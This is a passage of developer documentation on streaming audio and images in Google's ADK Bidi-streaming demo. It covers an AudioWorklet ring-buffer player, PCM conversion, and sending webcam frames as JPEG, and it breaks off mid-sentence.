framesPerBlock = output[0].length; for (let frame = 0; frame < framesPerBlock; frame++) { // Write samples to output buffer (mono to stereo) output[0][frame] = this.buffer[this.readIndex]; // left channel if (output.length > 1) { output[1][frame] = this.buffer[this.readIndex]; // right channel (duplicate for stereo) } // Move read index forward unless buffer is empty (underflow protection) if (this.readIndex != this.writeIndex) { this.readIndex = (this.readIndex + 1) % this.bufferSize; } // If readIndex == writeIndex, we're out of data - output silence (0.0) } return true; // Keep processor alive (return false to terminate) } } registerProcessor('pcm-player-processor', PCMPlayerProcessor); ``` **Key Implementation Patterns:** 1. **Base64 Decoding**: The server sends audio data as base64-encoded strings in JSON. The client must decode to ArrayBuffer before passing to AudioWorklet. Handle both standard base64 and base64url encoding. 1. **24kHz Sample Rate**: The AudioContext must be created with `sampleRate: 24000` to match Live API output format (different from 16kHz input). 1. **Ring Buffer Architecture**: Use a circular buffer to handle variable network latency and ensure smooth playback. The buffer stores Float32 samples and handles overflow by overwriting oldest data. 1. **PCM16 to Float32 Conversion**: Live API sends 16-bit signed integers. Divide by 32768 to convert to Float32 in range [-1.0, 1.0] required by Web Audio API. 1. **Mono to Stereo**: The processor duplicates mono audio to both left and right channels for stereo output, ensuring compatibility with all audio devices. 1. **Interruption Handling**: On interruption events, send `endOfAudio` command to clear the buffer by setting `readIndex = writeIndex`, preventing playback of stale audio. This architecture ensures smooth, low-latency audio playback while handling network jitter and interruptions gracefully. 
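
The read/write index scheme used by the player processor can also be exercised outside the browser. The following is a minimal Python sketch of the same idea, not the demo's code: the class `PcmRingBuffer` and its method names are hypothetical, and on underflow it emits explicit `0.0` samples rather than re-reading the slot at the read index.

```python
class PcmRingBuffer:
    """Fixed-size circular buffer of float samples (illustrative sketch)."""

    def __init__(self, capacity: int) -> None:
        if capacity < 2:
            raise ValueError("capacity must be at least 2")
        self._buffer = [0.0] * capacity
        self._capacity = capacity
        self._write_index = 0  # next slot to write
        self._read_index = 0   # next slot to play

    def enqueue(self, int16_samples) -> None:
        """Convert 16-bit samples to floats in [-1.0, 1.0) and store them."""
        for sample in int16_samples:
            self._buffer[self._write_index] = sample / 32768
            self._write_index = (self._write_index + 1) % self._capacity
            # Overflow: drop the oldest unplayed sample.
            if self._write_index == self._read_index:
                self._read_index = (self._read_index + 1) % self._capacity

    def read_block(self, frames: int) -> list[float]:
        """Return `frames` samples, padding with silence on underflow."""
        block = []
        for _ in range(frames):
            if self._read_index != self._write_index:
                block.append(self._buffer[self._read_index])
                self._read_index = (self._read_index + 1) % self._capacity
            else:
                block.append(0.0)  # buffer empty: output silence
        return block

    def clear(self) -> None:
        """Discard unplayed audio, e.g. when the user interrupts the model."""
        self._read_index = self._write_index


ring = PcmRingBuffer(capacity=4)
ring.enqueue([16384, -32768])
print(ring.read_block(3))  # two samples, then one frame of silence
```

Note that one slot always stays unused so that `read_index == write_index` can unambiguously mean "empty"; a buffer of capacity `n` therefore holds at most `n - 1` unplayed samples.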
## How to Use Image and Video Both images and video in ADK Bidi-streaming are processed as JPEG frames. Rather than typical video streaming using HLS, mp4, or H.264, ADK uses a straightforward frame-by-frame image processing approach where both static images and video frames are sent as individual JPEG images. **Image/Video Specifications:** - **Format**: JPEG (`image/jpeg`) - **Frame rate**: 1 frame per second (1 FPS) recommended maximum - **Resolution**: 768x768 pixels (recommended) Demo implementation: [main.py:202-217](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L202-L217) ```python # Decode base64 image data image_data = base64.b64decode(json_message["data"]) mime_type = json_message.get("mimeType", "image/jpeg") # Send image as blob image_blob = types.Blob( mime_type=mime_type, data=image_data ) live_request_queue.send_realtime(image_blob) ``` **Not Suitable For**: - **Real-time video action recognition** - 1 FPS is too slow to capture rapid movements or actions - **Live sports analysis or motion tracking** - Insufficient temporal resolution for fast-moving subjects **Example Use Case for Image Processing**: In the [Shopper's Concierge demo](https://youtu.be/LwHPYyw7u6U?si=lG9gl9aSIuu-F4ME&t=40), the application uses `send_realtime()` to send the user-uploaded image. The agent recognizes the context from the image and searches for relevant items on the e-commerce site. ### Handling Image Input at the Client In browser-based applications, capturing images from the user's webcam and sending them to the server requires using the MediaDevices API to access the camera, capturing frames to a canvas, and converting to JPEG format. The bidi-demo demonstrates how to open a camera preview modal, capture a single frame, and send it as base64-encoded JPEG to the WebSocket server. **Architecture:** 1. **Camera access**: Use `navigator.mediaDevices.getUserMedia()` to access webcam 1. 
**Video preview**: Display live camera feed in a `